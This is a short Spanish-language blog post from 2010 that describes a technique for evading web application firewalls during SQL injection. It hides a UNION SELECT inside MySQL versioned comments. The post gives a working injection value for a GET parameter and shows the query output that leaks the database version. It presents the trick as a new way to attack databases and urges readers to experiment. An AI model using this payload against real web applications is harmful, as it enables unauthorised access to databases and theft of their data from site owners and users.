Personal information:

A Coruña, Galicia, Spain

domingo, 14 de febrero de 2010

Bypasseando WAF con comentarios MySQL

Acabo de enterarme de una opción que disponen las bases de datos MySQL, la cual permite ejecutar una consulta contenida entre comentarios (/*sql*/).
Si al comienzo del comentario, incluímos un signo de exclamación " ! ",seguido de un número menor que el de la versión del DBMS, éste ejecutará dicha petición.
En teoría esto, si lo aplicamos dentro de un UNION, nos permitiría bypassear al WAF >:).

Un ejemplillo:

-Imaginemos que esta es la consulta que llega desde un servidor web, con $_GET["user"]="USUARIO";

mysql> select host from user where user='USUARIO';
+------------+
| host |
+------------+
| 127.0.0.1 |
| MyDebian |
| localhost |
+------------+
3 rows in set (0.00 sec)



-Ahora, con $_GET["user"]="'/*!union select @@version*/";

mysql> select host from user where user=''/*!union select @@version*/;
+------------------------+
| host |
+------------------------+
| 5.0.51a-24+lenny2+spu1 |
+------------------------+
1 row in set (0.00 sec)

Como podemos observar..rula!. Por supuesto, existen variantes de esta consulta, así que os recomiendo jugar un ratito con vuestras bases de datos jeje.
Así, podemos concluir con que tenemos un nuevo golpe que propinar a las BBDD, ya sabéis..Al abordaje!

-H4ppyH4ck1n9-

No hay comentarios:

Publicar un comentario